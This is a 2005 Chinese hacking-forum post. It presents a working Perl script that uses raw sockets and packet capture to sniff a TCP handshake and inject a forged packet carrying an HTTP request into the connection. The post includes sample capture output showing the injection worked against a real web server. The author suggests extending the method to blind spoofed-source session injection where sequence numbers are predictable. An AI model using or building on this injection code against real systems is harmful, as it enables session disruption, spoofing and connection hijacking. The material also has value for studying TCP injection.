标题:
在TCP三次握手后插入伪造的TCP包
[打印本页]
作者:
Jesse
时间:
2005-5-15 20:29
标题:
在TCP三次握手后插入伪造的TCP包
在TCP三次握手后插入伪造的TCP包 一、说明 用Socket的API Connect完成TCP建立连接的三次握手,同时子进程抓包,抓完三次握手的包后,插入第四个包即可,从对端返回的第五个包来看插入成功了,但因为插入了一个TCP包,之后的连接将发生混乱。可以将插入的那个包Data设置为HTTP Request,向WEB服务器提交请求。又如果目标系统的TCP序列号是可预计算的,那么是否可以做带伪源地址的Blind TCP three-time handshakes和插入,值得试验! 二、脚本 1、用到几个模块Net::RawIP Net::Pcap Net::PcapUtils NetPacket; 2、pretty_table()函数是我原来做的,用来在命令行下打印表格(Table); 3、测试环境-Linux、ADSL拨号,抓包的接口是ppp0,帧的结构和Eth帧结构不同,不能使用NetPacket::Ethernet模块中的strip函数处理帧首部,根据ethereal抓包的结构,我使用unpack函数取得了帧中的IP包; 三、源代码 #!/usr/bin/perl #By i_am_jojo@msn.com, 2005/04 use strict; use warnings; use Net::RawIP; use Net::PcapUtils; use NetPacket::Ethernet; use NetPacket::IP; use NetPacket::TCP; use Socket; use Getopt::Std; use POSIX qw(strftime); my %opts; getopts(';ht:p:u:n:';, \%opts); print_help() and exit if(defined($opts{';h';})); print_help() and exit if(not defined($opts{';t';}) or not defined($opts{';p';})); die "\tInvalid Target Ipaddress!\n" if(defined($opts{';t';}) and $opts{';t';} !~ m/^\d+.\d+.\d+.\d+$/); die "\tInvalid Service Port!\n" if(defined($opts{';p';}) and $opts{';p';} !~ m/^\d+$/); my $request; if(defined($opts{';u';})) { $request = "GET $opts{';u';} HTTP/1.1\r\n"; $request.= "Accept: text/html; text/plain\r\n"; $request.= "\r\n"; } else { $request = "GET / HTTP/1.1\r\n"; $request.= "Accept: text/html; text/plain\r\n"; $request.= "\r\n"; } my $child = fork(); if($child == 0) { #child process my ($next_packet, %next_header); my ($frame_hdr, $ip_packet); my ($ip_obj, $tcp_obj); my $counter = 0; my $pkt_descriptor = Net::PcapUtils::open( FILTER => ';ip';, PROMISC => 0, DEV => ';ppp0';, #DEV => ';eth0'; ); die "Net::PcapUtils::open returned: $pkt_descriptor\n" if (!ref($pkt_descriptor)); print strftime ';%Y/%m/%d %H:%M:%S, ';, localtime and print "begin sniffing ...\n"; while(($next_packet, %next_header) = Net::PcapUtils::next($pkt_descriptor)) { ($frame_hdr, $ip_packet) = unpack ';H32a*';, $next_packet; $ip_obj = NetPacket::IP->decode($ip_packet); #$ip_obj = NetPacket::IP->decode(NetPacket::Ethernet::eth_strip($next_packet)); next if ($ip_obj->{';proto';} != 6); next if (($ip_obj->{';src_ip';} ne $opts{';t';}) and ($ip_obj->{';dest_ip';} ne $opts{';t';})); $tcp_obj = NetPacket::TCP->decode($ip_obj->{';data';}); next if (($tcp_obj->{';src_port';} ne $opts{';p';}) and ($tcp_obj->{';dest_port';} ne $opts{';p';})); $counter++; print "==ID.$counter==", ';='; x 60, "\n"; print get_ip_hdr($ip_obj); print get_tcp_hdr($tcp_obj); if($tcp_obj->{';data';}) { my $data; $data = unpack ';a*';, $tcp_obj->{';data';}; $data =~ s/[\r][\n]//g; print pretty_table(';TCP data';, [$data]); } if($counter == 3) { my $a = new Net::RawIP; $a->set({ ';ip'; => { ';id'; => $ip_obj->{';id';} + 1, ';saddr'; => $ip_obj->{';src_ip';}, ';daddr'; => $ip_obj->{';dest_ip';} }, ';tcp'; => { ';source'; => $tcp_obj->{';src_port';}, ';dest'; => $tcp_obj->{';dest_port';}, ';seq'; => $tcp_obj->{';seqnum';}, ';ack_seq'; => $tcp_obj->{';acknum';}, ';window'; => $tcp_obj->{';winsize';}, ';data'; => $request, ';psh'; => 1, ';ack'; => 1 } }); $a->send; } last if($counter == 5); } exit; } else { sleep(1); my $trans_serv = getprotobyname(';tcp';); my $dest_sockaddr = sockaddr_in($opts{';p';}, inet_aton($opts{';t';})); socket(TCP_SOCK, PF_INET, SOCK_STREAM, $trans_serv); connect(TCP_SOCK, $dest_sockaddr); sleep(1); #close TCP_SOCK; } exit; sub print_help { print <
-h print help -t target ipaddr -p service port -u requested url by:i_am_jojo\@msn.com HELP } sub get_ip_hdr { my $ip_obj = shift; my @ip_hdr; push @ip_hdr, [qw(ver tos flags id src_ip proto)]; push @{$ip_hdr[1]}, $ip_obj->{$_} foreach (qw(ver tos flags id src_ip proto)); push @ip_hdr, [qw(hlen len foffset ttl dest_ip cksum)]; push @{$ip_hdr[3]}, $ip_obj->{$_} foreach (qw(hlen len foffset ttl dest_ip cksum)); return pretty_table(';IP Header';, @ip_hdr); } sub get_tcp_hdr { my $tcp_obj = shift; my @tcp_hdr; push @tcp_hdr, [qw(src_port seqnum hlen flags)]; push @{$tcp_hdr[1]}, $tcp_obj->{$_} foreach (qw(src_port seqnum hlen flags)); push @tcp_hdr, [qw(dest_port acknum reserved winsize)]; push @{$tcp_hdr[3]}, $tcp_obj->{$_} foreach (qw(dest_port acknum reserved winsize)); return pretty_table(';TCP Header';, @tcp_hdr); } sub pretty_table { # prettyTable($aString, @aList); @aList = ( [...], [...] ); # by i_am_jojo@msn.com my ($title, @data) = @_; my @temp; my @max_length; my $row_length; my $indent = 4; my $the_table; foreach my $col (0..$#{$data[0]}) { push @{$temp[$col]}, $_->[$col] foreach (@data); } $max_length[$_] = length( (sort{length($b) <=> length($a)} @{$data[$_]} )[0]) + 2 foreach (0..$#data); $row_length+= $max_length[$_] foreach (0..$#{$temp[0]}); $row_length+= $#data; $the_table = '; '; x $indent.';+';.';-'; x $row_length."+\n"; $the_table.= '; '; x $indent.';| ';.$title.'; '; x ($row_length - length($title) - 1)."|\n"; foreach my $row (0..$#temp) { $the_table.= '; '; x $indent; $the_table.= ';+';.';-'; x $max_length[$_] foreach (0.. $#{$temp[0]}); $the_table.= "+\n"; $the_table.= '; '; x $indent; $the_table.= ';| ';.@{$temp[$row]}[$_].'; '; x ($max_length[$_] - length(@{$temp[$row]}[$_]) - 1) foreach (0.. $#{$temp[0]}); $the_table.= "|\n"; } $the_table.= '; '; x $indent; $the_table.= ';+';.';-'; x $max_length[$_] foreach (0.. $#{$temp[0]}); $the_table.= "+\n"; return $the_table; } 四、结果举例 ==Result eXample== 2005/05/02 21:51:23, begin sniffing ... ==ID.1============================================================== +---------------------------------------------------+ | IP Header | +--------+---------------+---------+----------------+ | ver | 4 | hlen | 5 | +--------+---------------+---------+----------------+ | tos | 0 | len | 60 | +--------+---------------+---------+----------------+ | flags | 2 | foffset | 0 | +--------+---------------+---------+----------------+ | id | 20682 | ttl | 64 | +--------+---------------+---------+----------------+ | src_ip | 218.11.149.14 | dest_ip | 64.233.189.104 | +--------+---------------+---------+----------------+ | proto | 6 | cksum | 31878 | +--------+---------------+---------+----------------+ +------------------------------------------+ | TCP Header | +----------+------------+-----------+------+ | src_port | 32851 | dest_port | 80 | +----------+------------+-----------+------+ | seqnum | 1104143983 | acknum | 0 | +----------+------------+-----------+------+ | hlen | 10 | reserved | 0 | +----------+------------+-----------+------+ | flags | 2 | winsize | 5808 | +----------+------------+-----------+------+ ==ID.2============================================================== +---------------------------------------------------+ | IP Header | +--------+----------------+---------+---------------+ | ver | 4 | hlen | 5 | +--------+----------------+---------+---------------+ | tos | 0 | len | 44 | +--------+----------------+---------+---------------+ | flags | 0 | foffset | 0 | +--------+----------------+---------+---------------+ | id | 63029 | ttl | 241 | +--------+----------------+---------+---------------+ | src_ip | 64.233.189.104 | dest_ip | 218.11.149.14 | +--------+----------------+---------+---------------+ | proto | 6 | cksum | 26154 | +--------+----------------+---------+---------------+ +------------------------------------------------+ | TCP Header | +----------+------------+-----------+------------+ | src_port | 80 | dest_port | 32851 | +----------+------------+-----------+------------+ | seqnum | 3660731207 | acknum | 1104143984 | +----------+------------+-----------+------------+ | hlen | 6 | reserved | 0 | +----------+------------+-----------+------------+ | flags | 18 | winsize | 4356 | +----------+------------+-----------+------------+ ==ID.3============================================================== +---------------------------------------------------+ | IP Header | +--------+---------------+---------+----------------+ | ver | 4 | hlen | 5 | +--------+---------------+---------+----------------+ | tos | 0 | len | 40 | +--------+---------------+---------+----------------+ | flags | 2 | foffset | 0 | +--------+---------------+---------+----------------+ | id | 20684 | ttl | 64 | +--------+---------------+---------+----------------+ | src_ip | 218.11.149.14 | dest_ip | 64.233.189.104 | +--------+---------------+---------+----------------+ | proto | 6 | cksum | 31896 | +--------+---------------+---------+----------------+ +------------------------------------------------+ | TCP Header | +----------+------------+-----------+------------+ | src_port | 32851 | dest_port | 80 | +----------+------------+-----------+------------+ | seqnum | 1104143984 | acknum | 3660731208 | +----------+------------+-----------+------------+ | hlen | 5 | reserved | 0 | +----------+------------+-----------+------------+ | flags | 16 | winsize | 5808 | +----------+------------+-----------+------------+ ==ID.4============================================================== +---------------------------------------------------+ | IP Header | +--------+---------------+---------+----------------+ | ver | 4 | hlen | 5 | +--------+---------------+---------+----------------+ | tos | 16 | len | 89 | +--------+---------------+---------+----------------+ | flags | 2 | foffset | 0 | +--------+---------------+---------+----------------+ | id | 20685 | ttl | 64 | +--------+---------------+---------+----------------+ | src_ip | 218.11.149.14 | dest_ip | 64.233.189.104 | +--------+---------------+---------+----------------+ | proto | 6 | cksum | 31830 | +--------+---------------+---------+----------------+ +------------------------------------------------+ | TCP Header | +----------+------------+-----------+------------+ | src_port | 32851 | dest_port | 80 | +----------+------------+-----------+------------+ | seqnum | 1104143984 | acknum | 3660731208 | +----------+------------+-----------+------------+ | hlen | 5 | reserved | 0 | +----------+------------+-----------+------------+ | flags | 24 | winsize | 5808 | +----------+------------+-----------+------------+ +--------------------------------------------+ | TCP data | +--------------------------------------------+ | GET / HTTP/1.1Accept: text/html; text/plai | +--------------------------------------------+ ==ID.5============================================================== +---------------------------------------------------+ | IP Header | +--------+----------------+---------+---------------+ | ver | 4 | hlen | 5 | +--------+----------------+---------+---------------+ | tos | 0 | len | 40 | +--------+----------------+---------+---------------+ | flags | 0 | foffset | 0 | +--------+----------------+---------+---------------+ | id | 47931 | ttl | 241 | +--------+----------------+---------+---------------+ | src_ip | 64.233.189.104 | dest_ip | 218.11.149.14 | +--------+----------------+---------+---------------+ | proto | 6 | cksum | 41256 | +--------+----------------+---------+---------------+ +------------------------------------------------+ | TCP Header | +----------+------------+-----------+------------+ | src_port | 80 | dest_port | 32851 | +----------+------------+-----------+------------+ | seqnum | 3660731208 | acknum | 1104144033 | +----------+------------+-----------+------------+ | hlen | 5 | reserved | 0 | +----------+------------+-----------+------------+ | flags | 16 | winsize | 4356 | +----------+------------+-----------+------------+ ===End===
作者:
绿茶之星
时间:
2005-5-16 14:46
标题:
在TCP三次握手后插入伪造的TCP包
很详细,谢谢!
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2